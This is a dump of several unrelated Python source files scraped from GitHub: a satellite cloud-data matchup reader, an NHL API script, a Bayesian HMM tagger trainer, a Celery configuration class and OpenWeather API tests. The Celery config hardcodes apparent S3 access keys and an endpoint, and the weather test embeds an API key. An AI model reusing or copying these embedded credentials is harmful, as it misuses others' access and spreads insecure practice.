'nsidc_surface_type': None, # V4 renamed from 'snow_ice_surface_type'\n 'snow_ice_surface_type': None,\n # 'nsidc_surface_type_texture': None,\n 'profile_time_tai': None, # renamed from \"Profile_Time\"\n 'feature_classification_flags': None,\n 'day_night_flag': None,\n 'feature_optical_depth_532': None,\n 'tropopause_height': None,\n 'profile_id': None,\n 'cad_score': None,\n # If a combination of 5 and 1km data are used for RESOLUTION=1\n # \"column_optical_depth_tropospheric_aerosols_1064_5km\": None,\n # \"column_optical_depth_tropospheric_aerosols_1064\": None,\n \"column_optical_depth_tropospheric_aerosols_532_5km\": None,\n \"column_optical_depth_tropospheric_aerosols_532\": None,\n \"column_optical_depth_aerosols_532_5km\": None,\n \"column_optical_depth_aerosols_532\": None,\n # \"column_optical_depth_tropospheric_aerosols_uncertainty_1064_5km\": None,\n # \"column_optical_depth_tropospheric_aerosols_uncertainty_532_5km\": None,\n \"column_optical_depth_cloud_532_5km\": None,\n # \"column_optical_depth_cloud_uncertainty_532_5km\": None,\n \"feature_optical_depth_532_5km\": None,\n \"layer_top_altitude_5km\": None,\n \"layer_top_pressure_5km\": None,\n \"number_layers_found_5km\": None,\n # Variables derived for 5km data\n # Also included if a combination of 5 and 1km data are used for RESOLUTION=1\n 'detection_height_5km': None,\n 'total_optical_depth_5km': None,\n \"feature_optical_depth_532_top_layer_5km\": None,\n 'cfc_single_shots_1km_from_5km_file': None,\n \"average_cloud_top_pressure_single_shots\": None,\n \"average_cloud_top_pressure_single_shots_5km\": None,\n \"average_cloud_top_single_shots\": None,\n \"average_cloud_top_single_shots_5km\": None,\n \"average_cloud_base_single_shots\": None,\n \"average_cloud_base_single_shots_5km\": None,\n \"single_shot_data\": None,\n # Variables derived from 5km file to 1kmresolution_\n 'cfc_single_shots_1km_from_5km_file': None,\n\n # From cloudsat:\n 'cal_modis_cflag': None,\n 'cloudsat_index': None,\n }\n\n\nclass CloudsatObject(DataObject):\n def __init__(self):\n DataObject.__init__(self)\n self.all_arrays = {\n 'clsat_max_height': None,\n 'longitude': None,\n 'latitude': None,\n 'imager_linnum': None,\n 'imager_pixnum': None,\n 'cloud_fraction': None,\n 'validation_height': None,\n 'validation_height_base': None,\n 'elevation': None,\n 'sec_1970': None,\n 'CPR_Cloud_mask': None,\n 'MODIS_Cloud_Fraction': None,\n 'MODIS_cloud_flag': None,\n 'Height': None,\n 'LO_RVOD_liquid_water_path': None,\n 'IO_RVOD_ice_water_path': None,\n 'LO_RO_liquid_water_path': None,\n 'IO_RO_ice_water_path': None,\n #'liq_water_path': None, # kg!/m2 R05\n #'ice_water_path': None, # kg!/m2 R05\n 'RVOD_liq_water_path': None, # g/m2 R04\n 'RVOD_ice_water_path': None, # g/m2 R04\n 'RO_liq_water_path': None, # g/m2 R05\n 'RO_ice_water_path': None, # g/m2 R05\n 'precip_liq_water_path_gm2': None, # g/m2\n 'cloud_liq_water_path_gm2': None, # g/m2 \n 'precip_ice_water_path_gm2': None, # g/m2 \n 'cloud_ice_water_path_gm2': None, # g/m2\n 'liq_water_path_gm2': None, # g/m2\n 'ice_water_path_gm2': None, # g/m2\n 'precip_liq_water_path': None, # kg/m2 R05\n 'cloud_liq_water_path': None, # kg/m2 R05\n 'precip_ice_water_path': None, # kg/m2 R05\n 'cloud_ice_water_path': None, # kg/m2 R05\n 'liq_water_path': None, # kg/m2 R05\n 'ice_water_path': None, # kg/m2 R05\n #'ice_water_content': None,\n #'liq_water_content': None,\n \"RVOD_CWC_status\": None,\n \"RO_CWC_status\": None,\n 'Phase': None,\n 'Profile_time': None,\n 'TAI_start': None,\n # From calipso\n 
'calipso_layer_base_altitude': None,\n 'calipso_layer_top_altitude': None,\n 'calipso_feature_classification_flags': None\n }\n\n\nclass DardarObject(DataObject):\n def __init__(self):\n DataObject.__init__(self)\n self.all_arrays = {\n 'sec_1970': None,\n 'latitude': None,\n 'longitude': None,\n 'imager_linnum': None,\n 'imager_pixnum': None,\n #'height': None,\n #'Z': None,\n 'bscat': None,\n 'bscat_perp': None,\n 'instrument_flag': None,\n 'iwc': None,\n 'Target_Lidar_Mask': None,\n 'effective_radius': None,\n 'N0star': None,\n 'temperature': None,\n 'day_night_flag': None,\n 'land_water_mask': None,\n 'tropopause_height': None,\n 'DARMASK_Simplified_Categorization': None\n }\n\n\nclass IssObject(DataObject):\n def __init__(self):\n DataObject.__init__(self)\n self.all_arrays = {\n # Name: Iss name .lower()\n 'longitude': None,\n 'latitude': None,\n # Derived:\n 'imager_linnum': None,\n 'imager_pixnum': None,\n 'sec_1970': None,\n 'elevation': None,\n 'cloud_fraction': None,\n 'validation_height': None,\n 'total_optical_depth_5km': None,\n # Used\n 'cloud_phase_fore_fov': None,\n 'feature_type_fore_fov': None,\n 'extinction_qc_flag_1064_fore_fov': None,\n 'layer_top_altitude_fore_fov': None,\n 'sky_condition_fore_fov': None,\n }\n\n\nclass AmsrObject(DataObject):\n def __init__(self):\n DataObject.__init__(self)\n self.all_arrays = {\n 'longitude': None,\n 'latitude': None,\n 'imager_linnum': None,\n 'imager_pixnum': None,\n 'imager_linnum_nneigh': None,\n 'imager_pixnum_nneigh': None,\n 'sec_1970': None,\n 'lwp': None,\n 'pixel_status': None,\n 'quality': None,\n 'surface_type': None}\n\n\nclass MoraObject(DataObject):\n def __init__(self):\n DataObject.__init__(self)\n self.all_arrays = {\n 'longitude': None,\n 'latitude': None,\n 'imager_linnum': None,\n 'imager_pixnum': None,\n 'cloud_base_height': None,\n 'sec_1970': None}\n\n\nclass SynopObject(DataObject):\n def __init__(self):\n DataObject.__init__(self)\n self.all_arrays = {\n 'longitude': None,\n 'latitude': None,\n 'imager_linnum': None,\n 'imager_pixnum': None,\n 'imager_linnum_nneigh': None,\n 'imager_pixnum_nneigh': None,\n 'total_cloud_cover': None,\n 'cloud_fraction': None,\n 'nh': None,\n 'cl': None,\n 'cm': None,\n 'ch': None,\n 'vvv': None,\n 'ww': None,\n 'temp': None,\n 'dtemp': None,\n 'sec_1970': None,\n 'pressure': None}\n\n\nclass TruthImagerTrackObject:\n def __init__(self, truth='calipso'):\n self.imager = ExtractedImagerObject()\n self.modis_lvl2 = ModisObject()\n if truth in 'calipso':\n self.calipso = CalipsoObject()\n self.calipso_aerosol = CalipsoObject()\n elif truth in 'cloudsat':\n self.cloudsat = CloudsatObject()\n elif truth in 'amsr':\n self.amsr = AmsrObject()\n elif truth in 'synop':\n self.synop = SynopObject()\n elif truth in 'mora':\n self.mora = MoraObject()\n elif truth in 'iss':\n self.iss = IssObject()\n elif truth in 'dardar':\n self.dardar = DardarObject()\n self.extra = ExtraObject()\n self.diff_sec_1970 = None\n self.truth_sat = truth\n self.imager_instrument = 'imager'\n\n def make_nsidc_surface_type_texture(self, kernel_sz=51):\n \"\"\"Derive the stdv of the ice dataset\"\"\"\n\n if self.calipso.all_arrays['nsidc_surface_type'] is not None:\n self.calipso.all_arrays['nsidc_surface_type_texture'] = sliding_std(\n self.calipso.all_arrays['nsidc_surface_type'], kernel_sz)\n\n def __add__(self, other):\n \"\"\"Concatenating two objects together\"\"\"\n for object_name in ['imager', 'calipso', 'calipso_aerosol', 'amsr', 'dardar',\n 'cloudsat', 'iss', 'mora', 'synop', 'modis_lvl2', 'modis', 
'extra']:\n            if hasattr(self, object_name):\n                setattr(self, object_name,\n                        getattr(self, object_name) +\n                        getattr(other, object_name))\n        try:\n            self.diff_sec_1970 = np.concatenate([self.diff_sec_1970,\n                                                 other.diff_sec_1970])\n        except ValueError:\n            # print "Don't concatenate member diff_sec_1970... " + str(e)\n            self.diff_sec_1970 = other.diff_sec_1970\n        return self\n\n    def extract_elements(self, idx=None, starti=None, endi=None):\n        for object_name in ['imager', 'calipso', 'calipso_aerosol', 'amsr', 'dardar',\n                            'cloudsat', 'iss', 'mora', 'synop', 'modis', 'extra']:\n            if hasattr(self, object_name):\n                obj = getattr(self, object_name)\n                setattr(self, object_name, obj.extract_elements(idx=idx, starti=starti, endi=endi))\n        try:\n            if idx is not None:\n                self.diff_sec_1970 = self.diff_sec_1970[idx]\n            else:\n                self.diff_sec_1970 = self.diff_sec_1970[starti:endi]\n        except ValueError:\n            # print "Don't concatenate member diff_sec_1970... " + str(e)\n            self.diff_sec_1970 = self.diff_sec_1970\n        return self\n\n\ndef get_stuff_to_read_from_a_reshaped_file(h5file, retv):\n    h5_groups = []\n    data_objects = []\n    if 'calipso' in h5file.keys():\n        h5_groups.append(h5file['/calipso'])\n        data_objects.append(retv.calipso)\n    if 'calipso_aerosol' in h5file.keys():\n        h5_groups.append(h5file['/calipso_aerosol'])\n        data_objects.append(retv.calipso_aerosol)\n    if 'pps' in h5file.keys():\n        h5_groups.append(h5file['/pps'])\n        data_objects.append(retv.imager)\n    if 'cci' in h5file.keys():\n        h5_groups.append(h5file['/cci'])\n        data_objects.append(retv.imager)\n    if 'seviri_hrit' in h5file.keys():\n        h5_groups.append(h5file['/seviri_hrit'])\n        data_objects.append(retv.imager)\n    if 'maia' in h5file.keys():\n        h5_groups.append(h5file['/maia'])\n        data_objects.append(retv.imager)  # keep groups and data objects aligned for the zip below\n    if 'oca' in h5file.keys():\n        h5_groups.append(h5file['/oca'])\n        data_objects.append(retv.imager)\n    if 'patmosx' in h5file.keys():\n        h5_groups.append(h5file['/patmosx'])\n        data_objects.append(retv.imager)\n    if 'modis_lvl2' in h5file.keys():\n        h5_groups.append(h5file['/modis_lvl2'])\n        data_objects.append(retv.modis_lvl2)\n    if 'cloudsat' in h5file.keys():\n        h5_groups.append(h5file['/cloudsat'])\n        data_objects.append(retv.cloudsat)\n    if 'dardar' in h5file.keys():\n        h5_groups.append(h5file['/dardar'])\n        data_objects.append(retv.dardar)\n    if 'iss' in h5file.keys():\n        h5_groups.append(h5file['/iss'])\n        data_objects.append(retv.iss)\n    if 'amsr' in h5file.keys():\n        h5_groups.append(h5file['/amsr'])\n        data_objects.append(retv.amsr)\n    if 'mora' in h5file.keys():\n        h5_groups.append(h5file['/mora'])\n        data_objects.append(retv.mora)\n    if 'synop' in h5file.keys():\n        h5_groups.append(h5file['/synop'])\n        data_objects.append(retv.synop)\n    if 'cmaprob_cots' in h5file:\n        h5_groups.append(h5file['/cmaprob_cots'])\n        data_objects.append(retv.extra)\n    if 'extra' in h5file:\n        h5_groups.append(h5file['/extra'])\n        data_objects.append(retv.extra)\n    return (h5_groups, data_objects)\n\n\ndef read_truth_imager_match_obj(filename, truth='calipso',\n                                read_all=True,\n                                read_var=[],\n                                skip_var=[]):\n    retv = TruthImagerTrackObject(truth=truth)\n    h5file = h5py.File(filename, 'r')\n    (h5_groups, data_objects) = get_stuff_to_read_from_a_reshaped_file(h5file, retv)\n    for group, data_obj in zip(h5_groups, data_objects):\n        imager_instrument = group.attrs.get("imager_instrument", None)\n        if imager_instrument is not None:\n            retv.imager_instrument = imager_instrument \n        for dataset in group.keys():\n            if dataset in skip_var:\n                continue\n            if (read_all or dataset in read_var or\n                (len(read_var) == 0 and dataset in data_obj.all_arrays.keys())):\n                
atrain_match_name = dataset\n if atrain_match_name in [\"snow_ice_surface_type\"]:\n atrain_match_name = \"nsidc_surface_type\"\n setattr(data_obj, atrain_match_name, group[dataset][...])\n retv.diff_sec_1970 = h5file['diff_sec_1970'][...]\n h5file.close()\n return retv\n\n\ndef read_files(files, truth='calipso', read_all=True, read_var=[], skip_var=[]):\n my_files = files.copy()\n tObj = read_truth_imager_match_obj(my_files.pop(), truth=truth, read_all=read_all, read_var=read_var, skip_var=skip_var)\n if len(my_files) > 0:\n for filename in my_files:\n tObj += read_truth_imager_match_obj(filename, truth=truth, read_all=read_all, read_var=read_var, skip_var=skip_var)\n return tObj\n\n\n# write matchup files\n\n\ndef write_truth_imager_match_obj(filename, match_obj, SETTINGS=None, imager_obj_name='pps'):\n \"\"\"Write *match_obj* to *filename*.\"\"\"\n datasets = {'diff_sec_1970': match_obj.diff_sec_1970}\n groups = {imager_obj_name: match_obj.imager.all_arrays}\n imager_attrs = {'imager_instrument': match_obj.imager_instrument}\n groups_attrs = {imager_obj_name: imager_attrs}\n for name in ['calipso', 'calipso_aerosol', 'iss', 'modis_lvl2', 'dardar',\n 'amsr', 'synop', 'mora', 'cloudsat', 'extra']:\n if hasattr(match_obj, name):\n groups[name] = getattr(match_obj, name).all_arrays\n write_match_objects(filename, datasets, groups, groups_attrs, SETTINGS=SETTINGS)\n return 1\n\n\ndef sliding_std(x, size=5):\n \"\"\"derive a sliding standard deviation of a data array\"\"\"\n from scipy.ndimage.filters import uniform_filter\n c1 = uniform_filter(x.astype('float'), size=size)\n c2 = uniform_filter(x.astype('float')*x.astype('float'), size=size)\n return abs(c2 - c1 * c1)**.5\n\n\nthe_used_variables = [\n 'longitude',\n 'latitude',\n 'sec_1970',\n 'imager_linnum',\n 'imager_pixnum',\n 'imager_linnum_nneigh',\n 'imager_pixnum_nneigh',\n 'sec_1970',\n 'elevation',\n # MODIS LVL2\n 'height',\n 'temperature',\n 'pressure',\n 'cloud_emissivity',\n 'cloud_phase',\n 'lwp',\n # AMSR\n 'lwp',\n 'imager_amsr_dist',\n 'pixel_status',\n 'quality',\n 'surface_type',\n # MORA\n 'cloud_base_height',\n # Cloudsat\n 'cloud_fraction',\n 'validation_height',\n 'LO_RVOD_liquid_water_path',\n 'IO_RVOD_ice_water_path',\n 'LO_RO_liquid_water_path',\n 'IO_RO_ice_water_path',\n 'RVOD_liq_water_path', # g/m2 R04\n 'RVOD_ice_water_path', # g/m2 R04\n 'RO_liq_water_path', # g/m2 R05\n 'RO_ice_water_path', # g/m2 R05\n 'precip_liq_water_path_gm2', # g/m2\n 'cloud_liq_water_path_gm2', # g/m2 \n 'precip_ice_water_path_gm2', # g/m2 \n 'cloud_ice_water_path_gm2', # g/m2\n 'liq_water_path_gm2', # g/m2\n 'ice_water_path_gm2', # g/m2\n 'precip_liq_water_path', # kg/m2 R05\n 'cloud_liq_water_path', # kg/m2 R05\n 'precip_ice_water_path', # kg/m2 R05\n 'cloud_ice_water_path', # kg/m2 R05\n 'liq_water_path', # kg/m2 R05\n 'ice_water_path', # kg/m2 R05\n #'ice_water_content',\n #'liq_water_content',\n \"RVOD_CWC_status\",\n # CALIPSO write do not combine\n 'cal_modis_cflag',\n 'cloudsat_index',\n\n # DARDAR\n #'height',\n #'Z',\n 'bscat',\n 'bscat_perp',\n 'instrument_flag',\n 'iwc',\n 'Target_Lidar_Mask',\n 'effective_radius',\n 'N0star',\n 'temperature',\n 'day_night_flag',\n 'land_water_mask',\n 'tropopause_height',\n 'DARMASK_Simplified_Categorization',\n\n # CALIPSO only (ISS?)\n 'minimum_laser_energy_532',\n 'cad_score',\n \"average_cloud_top_pressure_single_shots\",\n \"average_cloud_top_pressure_single_shots_1km\",\n \"average_cloud_top_single_shots\",\n \"average_cloud_top_single_shots_1km\",\n 'profile_id',\n 
'layer_top_altitude',\n 'layer_top_altitude_fore_fov',\n 'layer_top_temperature',\n 'layer_top_pressure',\n 'layer_base_altitude',\n 'layer_base_pressure',\n 'midlayer_temperature',\n 'number_layers_found',\n 'igbp_surface_type',\n 'nsidc_surface_type',\n 'snow_ice_surface_type',\n 'surface_type_fore_fov',\n 'feature_classification_flags',\n 'feature_optical_depth_532',\n 'single_shot_data',\n 'cfc_single_shots_1km_from_5km_file',\n 'feature_optical_depth_532_top_layer_5km',\n 'feature_optical_depth_532_5km',\n 'total_optical_depth_5km',\n 'detection_height_5km',\n 'column_optical_depth_cloud_532',\n 'column_optical_depth_cloud_uncertainty_532',\n 'column_optical_depth_tropospheric_aerosols_532_5km',\n 'column_optical_depth_tropospheric_aerosols_532',\n 'column_optical_depth_aerosols_532_5km',\n 'column_optical_depth_aerosols_532',\n \"layer_top_altitude_5km\",\n \"layer_top_pressure_5km\",\n 'number_cloudy_single_shots',\n \"average_cloud_base_single_shots_5km\",\n \"average_cloud_top_pressure_single_shots_5km\",\n \"average_cloud_top_single_shots_5km\",\n # CLOUDSAT only\n 'clsat_max_height',\n 'validation_height_base',\n 'MODIS_Cloud_Fraction',\n 'MODIS_cloud_flag',\n 'calipso_layer_base_altitude',\n 'calipso_layer_top_altitude',\n 'calipso_feature_classification_flags']\n# ----------------------------------------\nif __name__ == \"__main__\":\n\n import os.path\n TESTDIR = (\"/local_disk/laptop/NowcastingSaf/FA/cloud_week_2013may\" +\n \"/atrain_matchdata/2012/10/arctic_europe_1km\")\n TESTFILE = os.path.join(TESTDIR,\n \"1km_npp_20121012_1246_04968_caliop_viirs_match.h5\")\n TESTFILE2 = os.path.join(TESTDIR,\n \"1km_npp_20121004_0700_04851_caliop_viirs_match.h5\")\n match_calipso = read_truth_imager_match_obj(TESTFILE)\n match_calipso2 = read_truth_imager_match_obj(TESTFILE2)\n\n match_calipso = match_calipso + match_calipso2\n","repo_name":"foua-pps/atrain_match","sub_path":"atrain_match/matchobject_io.py","file_name":"matchobject_io.py","file_ext":"py","file_size_in_byte":25648,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"27"} +{"seq_id":"14637248256","text":"#~/usr/bin/env python3\nimport requests\nimport pandas\nimport json\nfrom colorama import Fore,Style,init\ninit()\n\n# GLOBAL\nAPI = \"https://statsapi.web.nhl.com/api/v1/teams\"\n\ndef main():\n # call the webservice\n res = requests.get(API)\n # print the response json\n print(res.json())\n\n # display names of teams\n print(f\"\\n{Fore.GREEN}{Style.BRIGHT}Team Names::\")\n teams = res.json().get(\"teams\")\n count = 1\n for team in teams:\n print(f\"{Fore.GREEN}{Style.BRIGHT}Team {count}. 
\")\n print(f\"\\t{Style.BRIGHT}{Fore.WHITE}Name: {Style.NORMAL}{team.get('name')}\")\n print(f\"\\t{Style.BRIGHT}Abbreviation: {Style.NORMAL}{team.get('abbreviation')}\")\n print(f\"\\t{Style.BRIGHT}Team Name: {Style.NORMAL}{team.get('teamName')}\")\n print(f\"\\t{Style.BRIGHT}Location Name: {Style.NORMAL}{team.get('locationName')}\")\n print(f\"\\t{Style.BRIGHT}First Year of Play: {Style.NORMAL}{team.get('firstYearOfPlay')}\")\n print(f\"\\t{Style.BRIGHT}Official Site URL: {Style.NORMAL}{team.get('officialSiteUrl')}\")\n print(f\"\\t{Style.BRIGHT}Active: {Style.NORMAL}{team.get('active')}\")\n count += 1\n\n itemsdf = pandas.DataFrame(teams)\n itemsdf.to_excel(\"teams.xlsx\")\n itemsdf.to_csv(\"teams.csv\")\n itemsdf.to_json(\"teams.json\", orient='records')\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dhruti-kosta/PythonBasics","sub_path":"week2/tuesday/tuesday_morning.py","file_name":"tuesday_morning.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22895680169","text":"import argparse, sys, os, time, codecs, random\nimport MeCab\nimport bhmm\n\nclass stdout:\n\tBOLD = \"\\033[1m\"\n\tEND = \"\\033[0m\"\n\tCLEAR = \"\\033[2K\"\n\ndef printb(string):\n\tprint(stdout.BOLD + string + stdout.END)\n\ndef printr(string):\n\tsys.stdout.write(\"\\r\" + stdout.CLEAR)\n\tsys.stdout.write(string)\n\tsys.stdout.flush()\n\n# 訓練データを形態素解析して各品詞ごとにその品詞になりうる単語の総数を求めておく\ndef build_corpus(filename):\n\tcorpus = bhmm.corpus()\n\tsentence_list = []\n\twith codecs.open(filename, \"r\", \"utf-8\") as f:\n\t\tfor sentence_str in f:\n\t\t\tsentence_list.append(sentence_str)\n\trandom.shuffle(sentence_list)\t# データをシャッフル\n\ttrain_split = int(len(sentence_list) * args.train_split)\n\n\tword_count = set()\t# 単語の種類の総数\n\tpos_count = set()\t# 品詞数\n\tmajor_pos_count = set()\t# 品詞数(大分類)\n\tWt_count = {}\n\n\ttagger = MeCab.Tagger()\n\ttagger.parse(\"\")\n\tfor i, sentence_str in enumerate(sentence_list):\n\t\tsentence_str = sentence_str.strip()\n\t\tif i % 10 == 0:\n\t\t\tprintr(\"データを準備しています ... 
{}\".format(i + 1))\n\t\tm = tagger.parseToNode(sentence_str)\t# 形態素解析\n\t\twords = []\n\t\twhile m:\n\t\t\tword = m.surface\n\t\t\tfeatures = m.feature.split(\",\")\n\t\t\tpos_major = features[0]\n\t\t\tpos = (pos_major + \",\" + features[1])\n\t\t\tmajor_pos_count.add(pos_major)\n\t\t\tpos_count.add(pos)\n\t\t\tif pos == \"名詞,数\":\n\t\t\t\tword = \"##\"\t\t# 数字は全て置き換える\n\t\t\twords.append(word)\n\t\t\tword_count.add(word)\n\t\t\tif pos_major not in Wt_count:\n\t\t\t\tWt_count[pos_major] = {}\n\t\t\tif word not in Wt_count[pos_major]:\n\t\t\t\tWt_count[pos_major][word] = 1\n\t\t\telse:\n\t\t\t\tWt_count[pos_major][word] += 1\n\t\t\tm = m.next\n\n\t\tif len(words) == 0:\n\t\t\tcontinue\n\n\t\t# データを追加\n\t\tcorpus.add_words(words)\n\n\tif args.supervised:\n\t\t# Wtは各品詞について、その品詞になりうる単語の数が入っている\n\t\tWt = [len(words) for tag, words in Wt_count.items()]\n\telse:\n\t\t# Wtに制限をかけない場合\n\t\tWt = [int(len(word_count) / args.num_tags)] * args.num_tags\n\n\treturn corpus, Wt\n\ndef main():\n\tassert args.train_filename is not None\n\ttry:\n\t\tos.mkdir(args.working_directory)\n\texcept:\n\t\tpass\n\n\t# 訓練データを追加\n\tcorpus, Wt = build_corpus(args.train_filename)\n\tdataset = bhmm.dataset(corpus, args.train_split, args.unknown_threshold)\t# 低頻度語を全てに置き換える\n\n\t# 単語辞書を保存\n\tdictionary = dataset.get_dict()\n\tdictionary.save(os.path.join(args.working_directory, \"bhmm.dict\"))\n\n\t# モデル\n\tnum_tags = len(Wt) if args.supervised else args.num_tags\n\tmodel = bhmm.model(num_tags, dataset, Wt)\n\n\t# ハイパーパラメータの設定\n\tmodel.set_temperature(args.start_temperature)\t\t# 温度の初期設定\n\tmodel.set_minimum_temperature(args.min_temperature)\t# 温度の下限\n\tmodel.set_initial_alpha(args.initial_alpha)\n\tmodel.set_initial_beta(args.initial_beta)\n\n\t# 学習の準備\n\ttrainer = bhmm.trainer(dataset, model)\n\n\t# 学習ループ\n\tdecay = (args.start_temperature - args.min_temperature) / args.epochs \n\tfor epoch in range(1, args.epochs + 1):\n\t\tstart = time.time()\n\t\ttrainer.gibbs()\t# 新しい状態系列をギブスサンプリング\n\t\ttrainer.anneal_temperature(decay)\t# 温度を下げる\n\n\t\t# ログ\n\t\telapsed_time = time.time() - start\n\t\tprintr(\"Iteration {} / {} - temp {:.3f} - {:.3f} sec\".format(epoch, args.epochs, model.get_temperature(), elapsed_time))\n\t\tif epoch % 1000 == 0:\n\t\t\tprintr(\"\")\n\t\t\tmodel.print_typical_words_assigned_to_each_tag(20, dictionary)\n\t\tif epoch % 100 == 0:\n\t\t\tprintr(\"ハイパーパラメータのサンプリング ...\")\n\t\t\ttrainer.update_hyperparameters()\t# ハイパーパラメータをサンプリング\n\t\t\tprintr(\"\")\n\t\t\tprint(\"log_likelihood: train {} - dev {}\".format(trainer.compute_log_p_dataset_train(), trainer.compute_log_p_dataset_dev()))\n\t\t\tmodel.save(os.path.join(args.working_directory, \"bhmm.model\"))\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"-file\", \"--train-filename\", type=str, default=None, help=\"訓練用のテキストファイルのパス..\")\n\tparser.add_argument(\"-epochs\", \"--epochs\", type=int, default=100000, help=\"総epoch.\")\n\tparser.add_argument(\"-cwd\", \"--working-directory\", type=str, default=\"out\", help=\"ワーキングディレクトリ.\")\n\tparser.add_argument(\"--supervised\", dest=\"supervised\", default=False, action=\"store_true\", help=\"各タグのWtを訓練データで制限するかどうか.指定した場合num_tagsは無視される.\")\n\tparser.add_argument(\"--unsupervised\", dest=\"supervised\", action=\"store_false\", help=\"各タグのWtを訓練データで制限するかどうか.\")\n\tparser.add_argument(\"-tags\", \"--num-tags\", type=int, default=20, help=\"タグの種類(semi_supervisedがFalseの時のみ有効).\")\n\tparser.add_argument(\"-unk\", \"--unknown-threshold\", type=int, default=1, 
help=\"出現回数がこの値以下の単語はに置き換える.\")\n\tparser.add_argument(\"-split\", \"--train-split\", type=float, default=0.9, help=\"テキストデータの何割を訓練データにするか.\")\n\tparser.add_argument(\"--start-temperature\", type=float, default=1.5, help=\"開始温度.\")\n\tparser.add_argument(\"--min-temperature\", type=float, default=0.08, help=\"最小温度.\")\n\tparser.add_argument(\"--initial-alpha\", \"-alpha\", type=float, default=0.003, help=\"alphaの初期値.\")\n\tparser.add_argument(\"--initial-beta\", \"-beta\", type=float, default=1.0, help=\"betaの初期値.\")\n\targs = parser.parse_args()\n\tmain()","repo_name":"musyoku/unsupervised-pos-tagging","sub_path":"bayesian-hmm/run/train_ja.py","file_name":"train_ja.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"ja","doc_type":"code","stars":16,"dataset":"github-code","pt":"27"} +{"seq_id":"4981366744","text":"import os\nfrom typing import get_type_hints, Union\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nclass CeleryConfigError(Exception):\n \"\"\"Exception raised for errors in celery environment variables.\"\"\"\n\n pass\n\ndef _parse_bool(val: Union[str, bool]) -> bool: \n\n \"\"\" convert values of other data types to bool type\n\n Args:\n val (Union[str, bool]): input environment variable\n\n Returns:\n bool: actual Boolean\n \"\"\"\n\n return val if type(val) == bool else val.lower() in ['true', 'yes', '1']\n\n# CeleryConfig class with required fields, default values, type checking, and typecasting for int and bool values\nclass CeleryConfig:\n \n DEBUG: bool = False\n # RABBITMQ\n RABBITMQ_HOST: str = 'rabbitmq'\n RABBITMQ_USERNAME: str = 'guest'\n RABBITMQ_PASSWORD: str = 'guest'\n RABBITMQ_PORT: int = 5672\n # REDIS\n REDIS_HOST: str = 'redis'\n REDIS_PORT: int = 6379\n REDIS_CELERY_DB_INDEX: int = 0\n REDIS_STORE_DB_INDEX: int = 0\n # S3\n S3_ACCESS_KEY_ID: str = 'HFjem90Dh2jUNBMl'\n S3_SECRET_ACCESS_KEY: str = 'SjA547SKtxEiTf0S5g5JCo1hhLrsMSEE'\n S3_BUCKET: str = 'c888701'\n S3_ENDPOINT_URL: str = 'http://c888701.parspack.net'\n SHARED_VOLUME = '/tmp'\n\n \"\"\"\n Map environment variables to class fields according to these rules:\n - Field won't be parsed unless it has a type annotation\n - Field will be skipped if not in all caps\n - Class field and environment variable name are the same\n \"\"\"\n \n def __init__(self, env):\n\n \"\"\" type checking, and typecasting \n\n Raises:\n CeleryConfigError: if required field not supplied\n CeleryConfigError: if required type not provided\n \"\"\" \n \n for field in self.__annotations__:\n if not field.isupper():\n continue\n\n # Raise CeleryConfigError if required field not supplied\n default_value = getattr(self, field, None)\n if default_value is None and env.get(field) is None:\n raise CeleryConfigError('The {} field is required'.format(field))\n\n # Cast env var value to expected type and raise CeleryConfigError on failure\n try:\n var_type = get_type_hints(CeleryConfig)[field]\n if var_type == bool:\n value = _parse_bool(env.get(field, default_value))\n else:\n value = var_type(env.get(field, default_value))\n\n self.__setattr__(field, value)\n except ValueError:\n raise CeleryConfigError('Unable to cast value of \"{}\" to type \"{}\" for \"{}\" field'.format(\n env[field],\n var_type,\n field\n )\n )\n\n def __repr__(self):\n return str(self.__dict__)\n\n# Expose Config object for app to import\nConfig = 
CeleryConfig(os.environ)\n","repo_name":"i1idan/fastapi-taskqueue","sub_path":"app/worker/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"33096985815","text":"import json\n\nimport requests\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nurl = \"https://api.openweathermap.org/data/2.5/weather\"\nmy_units = \"metric\"\nmy_api_key = \"ad48510a9aed1ff96b51557d94bc5964\"\ncity_name = \"Jerusalem\"\n\n\nclass Test_Open_Weather:\n def test_lolo(self):\n print(\"kuku\")\n\n def test_01(self):\n params = dict(q=city_name, units=my_units, appid=my_api_key)\n response = requests.get(url, params)\n print(response)\n print(json.dumps(response.json(), indent=2))\n\n def test_02(self):\n params = dict(q=city_name, units=my_units, appid=my_api_key)\n response = requests.get(url, params)\n result = response.json()\n print(json.dumps(result, indent=2))\n print(response.status_code)\n print(\"Content-Type: \", response.headers['Content-Type'])\n print(\"Date: \", response.headers['Date'])\n assert response.headers['Content-Type'] == 'application/json; charset=utf-8'\n assert response.status_code == 200\n\n def test_03(self):\n params = dict(q=city_name, units=my_units, appid=my_api_key)\n response = requests.get(url, params)\n print(json.dumps(response.json(), indent=2))\n res = response.json()\n assert res['sys']['country'] == 'IL'\n humidity = res['main']['humidity']\n print(humidity)\n\n def test_04(self):\n driver = webdriver.Chrome(ChromeDriverManager().install())\n driver.maximize_window()\n driver.get('https://openweathermap.org')\n driver.find_element_by_css_selector(\"input[placeholder='Weather in your city']\").send_keys(\"Jerusalem,IL\")\n\n","repo_name":"philco01/important_concepts.py","sub_path":"rest_api/test_eather_apy.py","file_name":"test_eather_apy.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41949727475","text":"numeros = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n# feo\n# primero = numeros[0]\n# segundo = numeros[1]\n# tercero = numeros[2]\n\n# cada uno de los elementos de la lista de numeros se guarda en una variable separada\nprimero, segundo, tercero, *otros1 = numeros\n# a la variable de n1 se le otorga el valor del primer elemento de la lista\n# y los otros elementos se guardan en una nueva lista llamada otros\nn1, *otros, penu, ultio = numeros\n\nprint(primero, segundo, tercero)\nprint(n1, otros, ultio, 